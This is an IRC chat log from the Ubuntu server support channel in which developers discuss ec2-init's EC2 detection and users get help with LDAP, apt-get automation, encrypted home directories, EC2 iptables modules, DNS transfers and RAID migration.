<soren> With wlan in them.
<smoser> but if you think otherwise, we can definitly add a check like "if I do not appear to be running in a virtual machine, then I am not not xen".
<soren> And 17 other nics.
<smoser> thats a fair statement.
<soren> As fair as yours.
<smoser> i wasn't being sarcastic. i agree. it is fair.
<soren> Well, I don't.
<soren> :)
<clusty> hey
<smoser> also, do you get "/proc/xen" if your running a para-virt kernel ?
<clusty> i am having yet another problem with LDAP user auth
<soren> Yes.
<smoser> or whatever that test would be?.
<clusty> i restarted the LDAP server machine and now the clients wont auth no more. i restared a client by hand and it works again
<smoser> yeah... ok now i'm sorry. i have to nix your solution
<clusty> this leads me to believe that PAM-LDAP is keeping a persistent connection to ldap and will nto reconnect
<clusty> clue how to fix without a reboot?
<smoser> as if someone is running this vm with ec2-init in a virtualbox or vmware, or some other VM
<smoser> they would not necissarily have such things. and i think that is a likely situation.
 * soren has to go to dinner and stuff
<Jad> hello, i read that ubuntu server supports cloud computing. is this like virtualization where multiple users can have multiple remote desktop connection to the same server or is it something entirely different?
<Jad> maybe it means that one application can run on multiple servers like windows azuri
<Jad> *azure
<erichammond> smoser, soren: Good points in the discussion about kernel modules on EC2 images.  I'm happy with either the current (just added) way or with initrd copying them in.  Both have their benefits and drawbacks as you listed.
<smoser> thanks for reading.
<erichammond> smoser, soren: If you're trying to detect whether ec2-init is on EC2 in order to decide if it should run, then I would again propose the following:
<erichammond> ec2-init is inert when initially installed as a package.  It requires a positive, conscious action to enable the startup scripts.  This could be done with a config file tweak or an explicit command which bumbling users would never accidentally run.
<erichammond> This solves the problem Martin listed of users accidentally installing the package to check it out and having their ssh host keys overwritten.
<erichammond> vmbuilder can easily tweak a file or run a command after installing the ec2-init package.
<erichammond> .
<smoser> that is true, and quite simple.
<smoser> there are 2 things i see as an issue with that
<smoser> 1. is that, then if someone takes the uec image (which has ec2-init set to active), and runs it under kvm on their system to debug, it will time out on first boot (which is annoying to me)
<smoser> 2. it doesn't give us some way to tell "am I on ec2", only "did someone tell me I was on ec2"
<smoser> erichammond, thoughts on that?
<smoser> 1 is fairly easily workaroundable by allowing a "not-on-ec2" cmdline to force ec2 into inert mode
<erichammond> smoser: There was a thread a long time ago on http://ec2forum.notlong.com about how to tell if you're on EC2.  As I recall, there was no good answer, but they were looking at it from a proof perspective instead of a "most likely" perspective so there might still be good ideas there for (2).
<smoser> 2 isn't really that big of a deal, other than that we were hoping to use this script to run otherplaces (ie, in the apport hook). it would be nice to have more truthful indication of the environment as opposed to a statement of how the OS is configured
<erichammond> I haven't thought about (1).
<smoser> wonder if soren can read that. i think its much simpler than a bunch of circumstantial guessing
<zul> why not just query the metadata service the very first thing you do and then exit?
<smoser> because the metadata service might not be there
<smoser> "yet"
<smoser> or, the non-ec2 user may have firewall configured such that attempts to reach http://169.254.169.254/ may just hang , causing annoying long timeout
<dendrobates> kirkland: if I reinstall but keep my home partinion and do not reformat it, will I have any problems with my encrypted home dirs?
<kirkland> dendrobates: depends...  jaunty install or karmic install?
<dendrobates> karmic
<kirkland> dendrobates: more specifically, do you have anything in /var/lib/ecryptfs/* ?
<clusty> how can I run apt-get dist-upgrade so that it answers yes to everything?
<clusty> i want to be able to upgrade a whole bunch of machines from a script
<dendrobates> kirkland: don't even have that dir.
<kirkland> dendrobates: you're fine, as long as there's nothing in /var/lib/ecryptfs/*
<kirkland> dendrobates: yup, then you're fine
<dendrobates> kirkland: cool thanks.
<kirkland> dendrobates: the key is that you have all of your config and encrypted data in /home/.ecryptfs/$USER
<smoser> clusty, DEBIAN_FRONTEND=noninteractive apt-get install --assume-yes
<clusty> smoser, thanks
<dendrobates> kirkland: I saw that, but I was still hesitant.  Should I tell the installer to encrypt or not when I install?
<kirkland> dendrobates: not
<dendrobates> kirkland: thanks
<kirkland> dendrobates: no problem; i haven't tested this use case yet, but others have
<kirkland> dendrobates: but i'm going to setup my next install this way
<dendrobates> kirkland: I would love to have the ability to auto encrypt and decrypt external drives.  any plans to extend the integration to usb drives?
<kirkland> dendrobates: hrm, depends on what you mean...
<clusty> smoser, DEBIAN_FRONTEND=noninteractive apt-get dist-upgrade --assume-yes ?
<kirkland> dendrobates: of course, you can add an ecryptfs entry in your /etc/fstab
<kirkland> dendrobates: and a udev rule
<smoser> maybe. (i only did the 'install' recently)
<smoser> but probably.
<clusty> worked thanks
<clusty> the welcome screen still shows: 5 packages to be installed
<clusty> who knows what caused it to not update...
<dendrobates> kirkland: yeah, I could, but not everyone could, and it would be nice to mark a drive as encrypted and for udev to decrypt it automatically when it sees that uuid.
<dendrobates> kirkland: great work though, I am loving ecryptfs.
<kirkland> dendrobates: i see; file an upstream feature request ;-)
<kirkland> dendrobates: good to hear, me too :-)
<kirkland> dendrobates: that article should be published in next month's Linux Magazine
<tyabux> is it ok to have a complete coud with only one machine? That is, one phyiscal box running eucalyptus-cloud, eucalyptus-cc and eucalyptus-nc?
<smoser> well, for anyone still playing at home, this is what i have right now. erichammond, zul, soren http://paste.ubuntu.com/277296/
<zul> smoser: uh what is it? :)
<smoser> we'll just change vm-builder to write 'active=1' (or some other var that we agree on) to /etc/ec2-init/ec2-config.cfg
<zul> ah ok
<zul> cool
<smoser> w'll call that early in /etc/init.d/ec2-init to determine "am i turned on"
<zul> why the switches? since its a apart of the init script
<smoser> it will be a standalone program
<smoser> and usable by anything else that wanted to check
<zul> gotcha
<bnjmn> i'm using a 64-bit ami and i want to replace the 64-bit python with a 32-bit one. whats the easiest way to do this?
<smoser> hm...
<zoopster> tyabux: you can run all of UEC on one computer, however there are limitations to the modes you can use, obviously
<uvirtbot> New bug: #435527 in libvirt (main) "[regression] apparmor profile not updated on attach and detach of devices" [High,Fix released] https://launchpad.net/bugs/435527
<zul_> back later
<ruben23> hi can i increase the storage size of my /opt/ directory on my linux server..?------->http://pastebin.com/m32a9a22
<ruben23> anyone have idea
<mushroomblue> anyone have any tips on how to resize an LVM partition?
<mushroomblue> I have 4 drives attached, but only two are being used.
<domas> mushroomblue: lvresize ?
<domas> mushroomblue: add disks to VG first
<mushroomblue> the disks have been added.
<mushroomblue> so maybe lvresize is what I needed. thanks.
<Daviey> smoser: is iptables expected to work in ec2?
<smoser> i would have expected so, yes.
<smoser> i do not know otherwise
<Daviey> ERROR: problem running iptables: FATAL: Could not load /lib/modules/2.6.31-300-ec2/modules.dep: No such file or directory
<Daviey> iptables v1.4.4: can't initialize iptables table `filter': iptables who? (do you need to insmod?)
<Daviey> Perhaps iptables or your kernel needs to be upgraded.
<Daviey> we can haz bug.
<smoser> where do you see this ?
<smoser> what ami
<Daviey> latest alpha, one moment
<Daviey> ami-fa658593
<smoser> what did you run that caused that ?
<smoser> oh
<Daviey> sudo iptables -L
<smoser> soryr
<smoser> i know
<Daviey> or even sudo ufw status
<smoser> for some reason i was thinking the alpha6 had this fixed
<smoser> you need to 'apt-get update && apt-get install linux-ec2'
<smoser> that is fixed now
<smoser> (now as in post yesterday)
<Daviey> smoser: ok, upgrading linux-ec2 yields:
<Daviey> http://erk.daviey.com/ec2-1.png
<Daviey> http://erk.daviey.com/ec2-2.png
<Daviey> is it fair to assume these are transient?
<smoser> yeah, just hit enter. there is a bug on that... let me find that number.
<Daviey> yeah, didn't realise there was a bug on it.
<smoser> grub is bug 434755
<Daviey> solved the module.
<uvirtbot> Launchpad bug 434755 in linux-ec2 "ec2 kernel has unnecessary dependencies" [Medium,Fix committed] https://launchpad.net/bugs/434755
<smoser> modules is bug 429169
<uvirtbot> Launchpad bug 429169 in vm-builder "ec2: Include kernel modules in AMIs" [Medium,In progress] https://launchpad.net/bugs/429169
<howie> how do i port forward vnc in shorwall to a box on the local network?
<uvirtbot> New bug: #436210 in eucalyptus (main) "use ssh -oStrictHostKeyChecking in euca_conf --discover-nodes" [Undecided,New] https://launchpad.net/bugs/436210
<uvirtbot> New bug: #397393 in apache2 (main) "can't bind to ::1" [Undecided,Confirmed] https://launchpad.net/bugs/397393
<uvirtbot> New bug: #436228 in openvpn (universe) "package openvpn 2.1~rc11-1ubuntu3 failed to install/upgrade: el subproceso post-installation script devolvi? el c?digo de salida de error 1" [Undecided,New] https://launchpad.net/bugs/436228
#ubuntu-server 2009-09-25
<pteague> any reason why ubuntu compiles the php gd with the libgd library instead of the using the --with-gd ?  the php gd library has more options built in & is apparently configured a bit better specifically for php
<KillMeNow> no idea
<foob12> clear
<ScottK> Generally we try to avoid using embedded copies of libraries.
<necro\> drac cards - is there no way for console access via putty/ssh shell?
 * genii sips and ponders how non-console ssh access might work
<pteague> genii: i think it might be more of an issue of not having sshd installed...  otherwise i'd wonder about non-console ssh access as well >.>
<pteague> ScottK: yeah & normally my preference is to extend a library in a new library for something specific, but php team i think has reasons for their own internal library...  they have to support $#!@% windows & keep things consistent between OSs... i believe there's the same issues with dates & locale
<Debolaz> pteague: I don't know about that, the PHP developers has a history of making very bad design choices.
 * genii thinks about PEAR and shivers
<pteague> i know the dates & locale issue was a pain because i specifically remember hearing somebody complaining about certain linux distributions using standard libs rather than compiling the php libs causing issues where the answers didn't match across platforms
<pteague> mentioning PEAR is just so... wrong.  PEAR requires no knowledge of how a computer works apparently...  php core requires knowledge of C which i think would make the average PEAR dev's brain explode
 * Debolaz hugs perl.
<pteague> although some PEAR ideas have been good...  DB, MDB, & MDB2 i would like to think evolved into PDO which php has needed for oh so long
<pteague> i think had i gotten started with perl i probably would have used it more
<Debolaz> I'm not always overjoyed by the language design of perl, but CPAN makes it far, far superior to other languages in terms of getting stuff done in the real world.
<aubre> thoughts on cloning Ubuntu Karmic node controllers? hardware is identical
<ScottK> If you're using Karmic for production, my thought it not good.
<aubre> it's a proof of concept system
<aubre> it won't be a production system
<ScottK> OK.  Well if the hardware is identical, it's probably mostly to clone the system.
<aubre> I have a node controller that's working and I just want to copy it to another system
<aubre> what software should I use to clone the system?
<ScottK> One thing to be careful of, if you system has /etc/iftab it has the mac address of the ethernet device in it and will have to be changed on the new system.
<ScottK> Probably dd.
<aubre> can dd work across a network?
<aubre> I figured I'd need something like Ghost or Clonezilla
<twb> aubre: no, it works with files and streams.  You can, however, use netcat to run a stream over network ports.
<aubre> twb: hmm something to think about
<uvirtbot> New bug: #436366 in net-snmp (main) "package libsnmp15 5.4.1~dfsg-12ubuntu3 failed to install/upgrade: " [Undecided,New] https://launchpad.net/bugs/436366
<Anirban1987> is there any difference between the terminology nameserver and dns server ?
<twb> Anirban1987: a nameserver could be using NIS or LDAP instead of DNS
<twb> or that windows protocol... NETBIOS?
<Anirban1987> twb: na na , I am on Ubuntu Server 9.04 . asking from its point of view
<twb> Anirban1987: however, sites that don't use DNS for hostname resolution tend to be rare these days.
<twb> Certainly Ubuntu can provide name services over any of those protocols.
<twb> Why do you ask?
<Anirban1987> twb: Actually I am planning to use OpenDNS for my server .
<Anirban1987> twb: Currently I can see it lists 208.130.152.7 and 209.130.152.8 as DNS
<twb> Anirban1987: OK, in /etc/resolv.conf "nameserver" means the DNS name server.
<twb> Anirban1987: resolv.conf is where your server acts as a DNS *client*.
<Anirban1987> twb: yeah , I was editing that file
<twb> Anirban1987: OpenDNS is unrelated to that.  OpenDNS is a service where *your* server can have a name, which *other* people can resolve to your IP address.
<twb> And obviously OpenDNS are just one supplier; for there's also groups like dyndns.org and zoneedit.
<twb> Or you can just host your own DNS records, which is what my company does (because they're masochistic old-school BUGs).
<sub> OpenDNS is not unrelated to resolv.conf
<sub> OpenDNS offers a free resolving/recursive DNS service.
<twb> sub: well, you know what I meant
<twb> There's negligible relation between your DNS client configuration and how your own A records are hosted.
<sub> I don't see where Anirban1987 says he was trying to host his own DNS, but I haven't scrolled up yet either :P
<twb> sub: using opendns = hosting your a record.
<sub> No...
<twb> Specifically, OpenDNS are hosting your records -- you aren't hosting them on your own server.
<sub> No, OpenDNS's primary thing is "use us for resolution" AFAIK
<Debolaz> sub is right.
<twb> Oh, I'm sorry.  I must have misunderstood
<twb> Anirban1987: ignore most of what I said
<sub> twb: I think you may have them confused with ZoneEdit, et al :)
<twb> sub: yeah, I did.
<twb> I looked at the first para of wikipedia's OpenDNS page and misunderstood it.
<sub> no worries
<Anirban1987> hmmm.... !
<Anirban1987> How is Webmin as control panel for Ubuntu 9.04 ?
<mushroomblue> disliked, for some reason.
<mushroomblue> apparently, it is not to be discussed in this channel.
<twb> This channel doesn't support using webmin.
<twb> This is for good reasons: webmin isn't part of Ubuntu, and it has an abysmal design, negligible quality control and input validation, and doesn't try very hard to be secure.
<Debolaz> twb: While I'm really not a fan of webmin, are there any good alternatives? Just curious.
 * Debolaz has been looking for a way to manage his server park from a central interface and landscape is a bit too anemic.
<Anirban1987> Actually I can't afford CPanel and Plesk. Any other free panel ??
<twb> Debolaz: unfortunately, nope
<twb> Officially I think we recommend ebox, but personally I didn't like the look of it.
<twb> Obviously for an intelligent admin, you should be using ssh.
<Debolaz> I've been looking a bit at ebox, but it seems the only way I get to try their centralized control interface is to purchase it.
<twb> The problem is that you don't want to hand your non-technical customer's staff that much power, when all the really need is a couple of operations like "add new user"
<twb> Debolaz: you mean centralized configuration, like a single config interface for your whole cluster or network of servers?
<Debolaz> twb: While giving staff members the possibility to perform certain tasks like the one you mentioned is one goal, I also want to reduce the amount of work I have to do. The "ssh" way simply does not scale.
<twb> A web interface is not automatically any more scalable than an ssh interface.
<Debolaz> But doing things manually through the command line will never scale, whileas a management interface designed for the task can.
<twb> Debolaz: my question is: are you trying to have a single administrative interface to manage a cluster or network of servers?
<Debolaz> That is what many fail to understand when they disregard any non-"hardcore-1337-admin" solutions.
<Debolaz> Now, I don't really care if the interface is web based or curses based. When I say web based, that's not really the important aspect.
<Debolaz> twb: Yes.
<pwnguin> of course ssh doesn't scale
<pwnguin> thats why we have clusterssh
<twb> Debolaz: then you should look at chef, puppet or cfengine.
<twb> pwnguin: clusterssh is really the wrong solution, particularly if your nodes are heterogeneous.
<pwnguin> twb: yea, more of a joke answer
 * Debolaz keeps hearing cfengine mentioned.
<twb> Debolaz: since they, unlike webmin (or ebox, I guess), are actually intended to address that issue.
<pwnguin> cfengine is the classic solution
<twb> I wouldn't even bother mentioning cfengine if I didn't have reservations about puppet's implementation
<twb> Particularly, puppet requires ruby everywhere, generally wants you to install the latest unstable version of the puppets and puppetmaster, and the wire protocol between them has no version negotiation step -- it just assumes you have the same version of puppet installed everywhere.
<pwnguin> twb: so you're saying puppet is built to solve the problems it created
<twb> pwnguin: I'm saying that it's a bit too "alpha" for me to put manage an international network with it.
<twb> Not that doing it by hand is really any better...
<pwnguin> anyways, these things do require you to be able to script everything.
<twb> pwnguin: meh, I'm not worried about that.
<twb> I would definitely trust puppet/chef/cfengine MORE than landscape, since at least I can RTFS the former.
<pwnguin> people use rhn
<pwnguin> nobody seems to cry out
<twb> People also use RHEL, and I can't stand THAT either
<pwnguin> we have rhel at work
<pwnguin> i'm not clear why
<twb> Hysterical raisins
<pwnguin> heh
<pwnguin> not far off the truth
<twb> Particularly if you deployed it around 2004, when it was the obvious choice
<pwnguin> oh no, this stuff goes back to 2001
<pwnguin> at least
<twb> I mean, unless you are in Europe, SuSE is automatically out, and Debian is out because they can't even commit to a release date.
<pwnguin> heh
<twb> What else is left?  Just proprietary stuff like Solaris
<pwnguin> well, i work for a college
<pwnguin> Debian isn't automatically out
<twb> Oh man, I was called in to look at the server of a "college" (read: dorm house).
<twb> It had Gentoo on it.
<pwnguin> heh yea
<pwnguin> my CS dept decided to switch from debian to gentoo
<twb> And its disks (one of which had died) had LVM, md RAID *and* EVMS configured on it
<twb> Fucking idiots
<twb> Gentoo is not for production any more than LFS or Debian/unstable is
<pwnguin> because the student admins knew gentoo and claimed it could do the stuff they needed that debian couldn't
<pwnguin> anyways, the college i work for is a bit enterprisey
<pwnguin> lots of rhel
<pwnguin> but stuff like rhel4
<twb> A lot of our customers still run RHEL4 and Knoppix.
<twb> It's really horrible
<mushroomblue> don't hate the distro.
<pwnguin> apparently someone used ubuntu for a project, and decided it was too different and hard
<mushroomblue> hate the admins.
<mushroomblue> a good gentoo admin is a valuable tool.
<pwnguin> sudo
<twb> mushroomblue: well, I hate yum, for example.
<mushroomblue> as do I.
<pwnguin> a good gentoo admin would be an equally effective ubuntu/debian admin
<twb> I don't care if a developer wants to run gentoo on his workstation, but I do not want the fileserver or the mailserver to be running gentoo.
<twb> ESPECIALLY if I am asked to babysit that server.
<mushroomblue> now, sure.
<twb> But I'm also not convinced that Gentoo has the same kind of rigorous Q/A that Debian provides.
<mushroomblue> because gentoo is broken horribly.
<mushroomblue> but make no mistake, when gentoo was popular, and not being ruined by seemant, it made ubuntu look like a bunch of hacks.
<mushroomblue> </rant>
<twb> IMO Ubuntu is still a bunch of hacks.
<twb> They take Debian, run it into the ground, then install the latest GNOME and call it a release.
<pwnguin> im not even sure what that means but
<twb> That's basically my view of Ubuntu
<twb> Ubuntu is on some of my servers because 1) it's more like Debian than the alternatives; and 2) Debian didn't have a solid release schedule.
<pwnguin> I don't see what's wrong with putting the latest GNOME release in the hands of users
<twb> pwnguin: I'm speaking of servers.  I don't really give a shit what users put on their workstations.
<twb> Because essentially I'm not responsible for that end
<pwnguin> then why complain about running debian into the ground
<twb> pwnguin: because running it into the ground applies to servers, too.
<twb> A more polite way of putting it would be to say that Ubuntu has, especially historically, primarily been a desktop distro and not worried too much if it shipped with server-related bits in a bit of a mess.
<pwnguin> on the other hand, with about a month left, ubuntu+1 is looking kinda wobbly
<twb> For example, old versions of Ubuntu didn't officially support package upgrades unless you used the GUI update tool
<twb> afk beer
<pwnguin> so who runs ubuntu+1 on a server?
<twb> pwnguin: not me!  I would only track LTS except for scratch servers.
<mattcen> Hey all. Just asked this question on #ubuntu, with no joy. *May* get more joy here: I'm looking for some information on how to use 'uvesafb' on Jaunty, so that my TTY will support 1680x1050 (my monitor's native resolution). Anybody here able to help? I fear that perhaps given that servers are usually headless, this is a niche area.
<qman__> mattcen, getting that to work properly is a complete crapshoot
<qman__> anything other than the standard 4:3 resolutions is really difficult to get working
<mattcen> qman__: I suspected as much. Perhaps not worth spending time on then. Thanks for the reply.
<mattcen> I know a friend at work who has done it; he uses Debian, and has almost given up on X completely. Might ask him how he went about it. Knowing him he probably messed with it for ages.
<qman__> you could at least set it to 1024x768 or 1280x960 to get more on the screen
<mattcen> Yeah I've done that.
<qman__> but anything else is like voodoo magic, it's possible, but highly dependent on your hardware, and might require compiling your own kernel
<mattcen> ... Which is where things start getting messy etc.
<mattcen> qman__: Thanks again! I shall go back to my Apache peformance testing (uni assignment) :-)!
<artillerytx> Hey guys for some reason i keep getting domain.com/AXFR/IN denied in my daemon.log
<artillerytx> looks like it can't transfer the zone records
<_ruben> from trusted sources or not ? :)
<artillerytx> Im trying to forward to my everydns.net slave dns
<artillerytx> so i've added for allowed transfers both name servers IP address and then the axfr.everydns.net IP as well
<_ruben> those denied messages in the log tend to list the ip address as well
<artillerytx> yeah its not any of the name servers IP addreses
<artillerytx> wait wait
<artillerytx> its the IP for the axfr.everydns.net
<artillerytx> so now that i've added that should work fine
<soren> smoser: http://pastebin.com/m249f845b
<soren> smoser: http://lists.xensource.com/archives/html/xen-changelog/2007-02/msg00075.html
<erichammond> soren: Here is one way to help figure out what times are good for the individuals in a group of people: http://www.doodle.com
<erichammond> It does get a bit unwieldy if you want folks to specify every single hour for every day in a week.
<erichammond> Let me know if you'd like help figuring it out or want me to set up an example.
<Jeeves_> Anyone here who works for Canonical? Something is broken on your internets.
<soren> Jeeves_: Elaborate, please.
<soren> erichammond: Neat. I'm just not sure how to map the whole DST farce in it.
<soren> erichammond: We switch DST at different times, and it's going to be tricky to get things adjusted in the transition periods.
<soren> Jeeves_: I can see http://www.ubuntu.com/, I can see http://launchpad.net/, I can log into machines in the DC..
<Jeeves_> soren: pm
<zul> morning
<ScottK> soren: Good luck picking a time that makes everyone happy.  This is never easy.
<soren> ScottK: I'm not trying to make everyone happy. That will inevitably fail. :) I'm trying to make noone (particularly myself) completely miserable.
<soren> The current meeting time fails spectacularly at that.
<kwork> by defaylt is postfix chrooted in ubuntu 8.04 ?
<kwork> default*
<soren> kwork: Yes.
<kwork> so if i set up some script in aliases i should give path relevant to chroot ?
<soren> I'm not sure, really.
<Jad> hello
<Jad> ubuntu server is like windows azure? that is its a cloud OS also?
<soren> It is nothing like Azure. Several cloud providers offer Ubuntu on their platform (e.g. Amazon and Rackspace).
<Jad> ok, but i mean in concept
<Jad> i mean your app runs on the server or a bunch of cloud connected servers
<Jad> so your app is hosted elsewhere
<Jad> isn't this singularity?
<soren> Ubuntu is an operating system.
<Jad> yes
<soren> What do you mean "yes"?
<soren> Ubuntu is a operating system. You can install it on your laptop and your servers. It runs applications and services.
<soren> Some cloud providers offer Ubuntu as the base operating system in their clouds.
<Jad> i mean i know what you mean, though i don't get much this cloud thing. does the server host processes that you run? for example if you run a game on your pc, will it run on the cloud connected to the pc, that is a ubuntu cloud for example?
<_ruben> plain ubuntu server has nothing to do with clouds
<soren> Most people do not have a cloud connected to their PC.
<soren> (whatever that means)
<soren> Do you know what an operating system is?
<Jad> sure
<soren> I'm not convinced. Your questions suggest otherwise.
<Jad> the OS thats connected to the ubuntu server is ubuntu or windows
<soren> What?
<soren> And OS is not connected to a server. That makes no sense.
<Jad> that is like a winxp connects to windows server via domain controller
<soren> ?!?
<soren> No.
<Jad> in xp i can log to a domain on a win server, doesn't ubuntu server let me log in to it the same way xp does?
<soren> Are you attempting to answer my question or are you asking something completely different?
<soren> In either case, this is very confusing.
<Jad> sorry for confusing you, 1 sec
<Jad> what i mean is i heard that ubuntu server can support roaming and domain accounts. also i know in xp you can log in as a user on a server's domain. maybe ubuntu server has the same thing also
<soren> Ubuntu is an operating system. It runs on a variety of different hardware, though usually on i386 and x86_64 based laptops, desktops, and servers.
<soren> What does that have to do with cloud computing or Azure?
<_ruben> Jad: ubuntu (server) has ldap support, which is similar to windows' active directory
<Pici> 'It has support' meaning there are packages that you can install and then configure that will add that functionality.
<soren> Pici: Who are you talking to?
<Pici> soren: just clarifying _ruben's statement for Jad.
<soren> Pici: Ok.
<soren> This whole conversation is confusing :)
<Pici> I agree.
<Jad> sorry was away, i see what you mean soren. i'll look at the ubuntu cloud computing, i guess windows cloud computing isn't for public yet
<_ruben> Jad: perhaps you could try to explain to us what your actual goals are? :)
<Jad> i want to build a game, can it run on multiple servers thereby sharing cpu load among the cloud? do i have to make the load management of cpu myself or the cloud of ubuntu has an app for it?
<soren> What kind of game is this?
<Jad> MMO using unreal or most likely cryengine
<soren> I mean.. I think very, very few games will need to run on more than one machine.
<Jad> better editor imho
<Jad> ok
<soren> And no, Ubuntu doesn't offer this. You have to "cloudify" your application yourself.
<Jad> so ubuntu offers to cloudify virtual machines for exmaple?
<_ruben> beowulf cluster comes to mind, which is aimed at distributed computing, never worked with it though
<Jad> maybe it clouds diskspace
<giovani> game servers generally aren't so cpu intensive that you'd need to cluster it
<giovani> since most of what they do are exchange coordinates, etc between players
<giovani> not render
<_ruben> WoW has rather largish server farm though ;)
<giovani> _ruben: I'm sure -- however, that's an obviously specialized case
<gamla_kossan> anyone familiar with syslog-ng in here?
<giovani> there are only a handful of games of that scale
<gamla_kossan> having a problem, can't get it to start wiht my new conf..
<giovani> gamla_kossan: somewhat -- I've used it -- just ask
<gamla_kossan> giovani: thanks - can you spot something odd with this snippet?
<gamla_kossan> http://fpaste.org/QKee/
<giovani> gamla_kossan: nothing stands right out -- there's one guy in #syslog-ng
<giovani> might want to ask him
<Jad> does ubuntu offer to cloudify its cpu time so that different apps running can run on different cpus of different servers? for example maybe when a new process on ubuntu cloud comes to run, ubuntu will see which server has the least cpu usage and make the process run on that server?
<gamla_kossan> giovani: thanks =)
<giovani> gamla_kossan: or post to the mailing list for syslog-ng
<gamla_kossan> good idea!
<Jad> or is it merely clouding disk space among virtual machines on ubuntu?
<soren> Jad: Neither.
<soren> Jad: You have to do all of that yourself. I already told you.
<soren> Jad: You have to make sure it scales across numerous servers both in terms of processing and storage.
<soren> Ubuntu is not going to do that for you.
<huats> hi soren
<huats> how are you ?
<soren> Hello.
<soren> Not on the phone :)
<huats> great :)
<huats> I have a question for you :)
<huats> of course you can RTFM me :)
<huats> I haven't been able to find the definition of the virbr0 interface
<huats> I have understand its usage
<huats> understood
<huats> but it is not mention on the help.ubuntu.com (there are only references to br0)
<Jad> soren, ok. but what does ubuntu cloud then if not disk space or it doesn't cloud anything. i have to do it all myself?
<Jad> does it have a cloud mangement app for example
<huats> Jad: from my understanding (but I might be right)
<huats> ubuntu is not going to change your application
<huats> it will create the cloud infrastructure
<huats> but your applications needs to be able to take advantage of it
<Jad> ok cool, what applications already take advantage of it, vmm esxi for example?
<soren> huats: virbr0 is created by libvirt. You can see its definition by running "virsh net-dumpxml default".
<huats> soren: ok
<Jad> sorry i meant vmware esxi
<huats> thanks soren
<soren> huats: sure thing.
<huats> soren: and the virbr0 is used for the nat in the vm right ?
<soren> Jad: No. VMWare is a hypervisor.
<soren> huats: Well.. Yes, sort of.
<soren> huats: Think of it as the switch all your VM's are plugged into.
<huats> soren: ok
<seyDoggy_> hey guys, can I ask some painfully newby-ish q's
<joe-mac> anybody here with an 8.04 HTTPS box?
<joe-mac> i think i'm seeing a regression of a memory leak, and if someone else can independently confirm/deny i can either move the ticket along probably or take a different avenue
<giovani> this relates to https?
<Pici> Apache? What release of Ubuntu?
<pmatulis> he said 8.04
<atomic_1> erm, why is iotop NOT in the hardy server repo ?
<heath|work> I need to check passwords in my web app against an ubuntu LDAP server. The passwords are returned like {crypt}<some letters>. Is there a salt or something some where? What alg is being used?
<Pici> pmatulis: oops :)
<giovani> heath|work: man crypt()
<giovani> or man 3 crypt rather
<gopp> anyone of a command line version of google desktop for ubuntu
<joe-mac> giovani: bug report is here ls -s $file | cut -d' ' -f1
<pmatulis> atomic_1: obviously no one put in the effort
<joe-mac> wrong paste
<joe-mac> https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/422138
<uvirtbot> Launchpad bug 422138 in apache2 "Slow memory leak, seen on two machines, appears to be dupe of 224945 even after -updates" [Undecided,Incomplete]
<joe-mac> it only relates to HTTP, appears to be a regression of #224945, but i just need some confirmation that i am either insane, or right
<joe-mac> HTTPS***
<soren> atomic_1: Because it didn't exist when Hardy was released.
<atomic_1> oh, i see
<atomic_1> thanks
<atomic_1> guess ill just compile it
<heath|work> giovani, ok I get what it is doing, but what sets the 2 char string?
<heath|work> ahh nvm. You just try and rebind with the users full dn... d'uh
<uvirtbot> New bug: #429749 in eucalyptus (main) "After installation, euca-run-instances fail unless you run euca-describe-groups first" [Undecided,Fix released] https://launchpad.net/bugs/429749
<orudie> is there a way i could set up a radio stream ?
<orudie> for shoutcast
<garymc> yes use shoutcast
<garymc> orudie :  Either record some mp3 files and place them on the server and get shoutcast to stream them, or use a third party peice of software called SAM broadcaster or winamp to stream live to the server and allow people to log onto your server ip with winamp or other win media player
<heath|work> I'm trying to use LDAP in our web app. I would like to store the allowed modules and other ACL info in the LDAP server. Does anyone have any reading they can suggest to me for such a thing?
<teddymills> Anyone have a URL that shows how to install and configure mdadm from a single drive Ubuntu 8042 server edition ?
<uvirtbot> Launchpad bug 8042 in nautilus "Text file with execute permission are opened in gedit" [Medium,Fix released] https://launchpad.net/bugs/8042
<teddymills> I do not see how this can be done. Existing filesytems are EXT3 and RAID1 filesystems are 'fd' linux raid auto.
<JanC> teddymills: what do you mean exactly?
<JanC> mdadm is for RAID, and RAID uses more than one drive by default?  ;)
<teddymills> If your running an exisitng single drive server Ubuntu 8042. Then want ot make it a RAID1..The partition types are EXT3. RAID1 are 'fd' linux raidauto.
<uvirtbot> Launchpad bug 8042 in nautilus "Text file with execute permission are opened in gedit" [Medium,Fix released] https://launchpad.net/bugs/8042
<JanC> teddymills: put in the points in the version in the future, so that uvirtbot doesn't think it's a bug #  ;)
<teddymills> If you change them to 'fd' you will probably wipe the entire server..If thats the case I may as well reinstall a new server. (not possible in this case since data must be retained)
<JanC> so, you want to add an extra disk, and create a RAID with the existing one and the new one?
<teddymills> yes
<JanC> that's possible, but it might be faster to do a new install  ;)
<teddymills> what about using g4L..and making a disk image of the single server..It would be nice if g4L can write to external SATA/USB drives.
<JanC> the trick you can use is to use the new disk to create a "broken" RAID1 (a mirror that's lacking 1 disk)
<JanC> then copy everything from the old drive to the new one
<JanC> and then add the old drive as the second mirror drive
<teddymills> is there anyway to install mdadm/raid1 on an existing server, without putting the server back together again from backups?
<JanC> that's what I just explained how to do  ;)
<zer0her0> anyone run a server on Amazon's EC2?
<teddymills> from what Jac was saying, the answer is yes, but the procedure is basically as bad as reinstalling the server from scratch
<JanC> teddymills: yeah, if you can make an image on an external disk, doing a new install might be faster...
<JanC> teddymills: on the occasion I did it, I didn't have a backup drive large enough around, so...
<joe-mac> teddymills: there is no 'easy' or streamlined way to do it
<joe-mac> if you have another server, to minimize downtime you can set that up first, do an rsync, then cutover
<teddymills> thx guys..knowing what does not work is important than knowing what does work  <--I just made that up. if no one else said it, then you heard it here first :)
<ttx> zul: please sync with smoser for ec2-init changes review + sponsoring
<smoser> ttx, i'll tag the bug as request for sponsor
<JanC> joe-mac: actually, the way I did it you have no more downtime than a normal reboot  ;)
<smoser> it is ready to go. and soren agrees to everything.
<seyDoggy_> installing ubuntu server onto PPC mac and it's stuck at 83% yaboot install. any ideas? can I recover from this?
<JanC> yaboot is the bootloader?
<seyDoggy_> JanC: yep
<JanC> I suppose you can always (re)install it later?  (no experience with PPC/yaboot)
<seyDoggy_> JanC: what can I do at the moment though? kill the whole process?
<JanC> maybe first try to find out what's up, but otherwise, not sure there is another option  ;)
<seyDoggy_> JanC: so how can I diagnose?
<uvirtbot> New bug: #433885 in mysql-dfsg-5.0 (main) "installation of mysql-server and phpmyadmin failed while system under stress" [Undecided,Incomplete] https://launchpad.net/bugs/433885
